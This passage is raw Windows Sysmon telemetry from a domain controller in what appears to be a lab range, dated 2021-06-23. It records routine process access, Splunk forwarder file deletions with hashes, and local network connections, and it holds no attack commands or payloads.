Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A237-60D3-9F04-00000000CF01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A237-60D3-9F04-00000000CF01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.696{4DB9351A-A237-60D3-9F04-00000000CF01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000021782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:58.261{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61446-false10.0.1.12-8000- 23542300x800000000000000021781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.101{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3595601EF8FA8F38CAA17E04F190D184,SHA256=66338FEDBBB3B516041FA3699AC7D58D48451BBF5611F53A58BE7605DAA9F22B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:00.711{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A37537FB7019FACC4EA6C6FF401CF2A8,SHA256=1F62ABC92BEA782F0C5141925B2EFB143F8E0F183C953CE9928540858AB2D7E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:00.179{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD8FD3F4DC5BEA9B48818B9F6E77B22E,SHA256=409135399FB742114F06B137BBD8852915A78E3BC2F48FF5E68CB5E1EA433BE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:01.211{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C69150F09B0E7FF716E1E034ABAD48,SHA256=1CE875DFC3FB9B9E21D17329EAED56B4FD101D24382D3AC62C625DA5E4972A4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:02.273{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1787ED23ACF43B036A7614536CE29E29,SHA256=5115D98242FBC6D165CCC23988DF7D1C4D947BCD72AC325048EC13C043C0C0A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:03.304{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2918F7D011218D9ED0B1D69AB7282130,SHA256=01E2BA83C956347D43E744E48FA74FDCEC293F6DD59A98FB6033D27D9548D700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:04.336{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2256B3BD0741DE13A9339945A44190CC,SHA256=D992FE2821A2897B4D03EC00C68C221B845AFC23E38B7A909E477A01C8123F3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000021798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:04.267{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61447-false10.0.1.12-8000- 23542300x800000000000000021797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:05.351{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F61933B983B0586918415ADBC73C54DE,SHA256=EFC53FC6452710F5CC56D1EEC6B13D839AB6E7D41A66C5FF46BBCFC0B91CC87D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:06.351{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653E47CF7D24783B3EB27D525FC9A03C,SHA256=4757F67110B05DD6282B652DDE2E90BCAB3A1E414772CD9D84A695B2DAD2AC92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:07.461{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D70FE2B0D1DF5F4620C1B9C3A355DCDE,SHA256=AFA959A603478DC703A1EB08F93E3CC28021EDAEB8495F8228B2F52605B9755D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:08.617{4DB9351A-A230-60D3-9804-00000000CF01}3196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c7c-0\System.Management.Automation.dll2021-06-23 21:06:08.617 23542300x800000000000000021801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:08.586{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E1DCA26F3ABFE9A016CE7D8F56D658D,SHA256=C19BBDFD48B79E5BA84A9CEA79C88535D253AB971DB8BC7425930F56F68145CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:09.758{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A241-60D3-A004-00000000CF01}6968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:09.618{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F83C970AA2BFB03634CC67FA1F7F0A8,SHA256=39F895ABA50949049B577AC203560419604DB35A228406E83CFC5B1A05F2BF71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:09.445{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A241-60D3-A004-00000000CF01}6968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:09.445{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A241-60D3-A004-00000000CF01}6968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000021848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 